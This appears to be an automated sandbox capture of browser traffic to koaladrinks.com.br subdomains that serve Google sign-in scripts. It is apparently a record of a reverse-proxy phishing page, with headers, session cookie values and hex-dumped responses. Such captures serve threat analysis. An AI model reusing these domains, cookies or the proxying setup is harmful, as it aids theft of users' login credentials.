                                                      2025-01-10 08:28:02 UTC2634OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,GLtV1c,I6YDgd,IZT63,JYtL0c,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,clOb9b,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNh [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
                                                      2025-01-10 08:28:02 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:02 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:02 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:02 GMT
                                                      2025-01-10 08:28:02 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:02 GMT
                                                      2025-01-10 08:28:02 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      81192.168.2.949811139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:03 UTC658OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
                                                      2025-01-10 08:28:04 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:28:04 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:04 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:04 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:04 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:28:04 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:04 GMT
                                                      2025-01-10 08:28:04 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:28:04 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:04 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:04 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:28:04 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      82192.168.2.949812139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:04 UTC2146OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,GLtV1c,I6YDgd,IZT63,JYtL0c,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,clOb9b,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNh [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
                                                      2025-01-10 08:28:04 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:04 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:04 UTC8INData Raw: 41 67 65 3a 20 32 0d 0a
                                                      Data Ascii: Age: 2
                                                      2025-01-10 08:28:04 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:04 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:04 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:04 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:04 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:04 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:04 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:02 GMT
                                                      2025-01-10 08:28:04 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:02 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      83192.168.2.949814139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:04 UTC2126OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYl [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
                                                      2025-01-10 08:28:05 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:05 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:05 UTC8INData Raw: 41 67 65 3a 20 32 0d 0a
                                                      Data Ascii: Age: 2
                                                      2025-01-10 08:28:05 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:05 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:05 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:05 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:05 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:05 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:05 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:02 GMT
                                                      2025-01-10 08:28:05 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:02 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      84192.168.2.949815139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:04 UTC1283OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 544
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
                                                      2025-01-10 08:28:04 UTC544OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 34 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 36 34 39 37 36 38 32 39 39 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"41",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1736497682998",null,null,null
                                                      2025-01-10 08:28:05 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:05 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:05 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:05 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:05 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
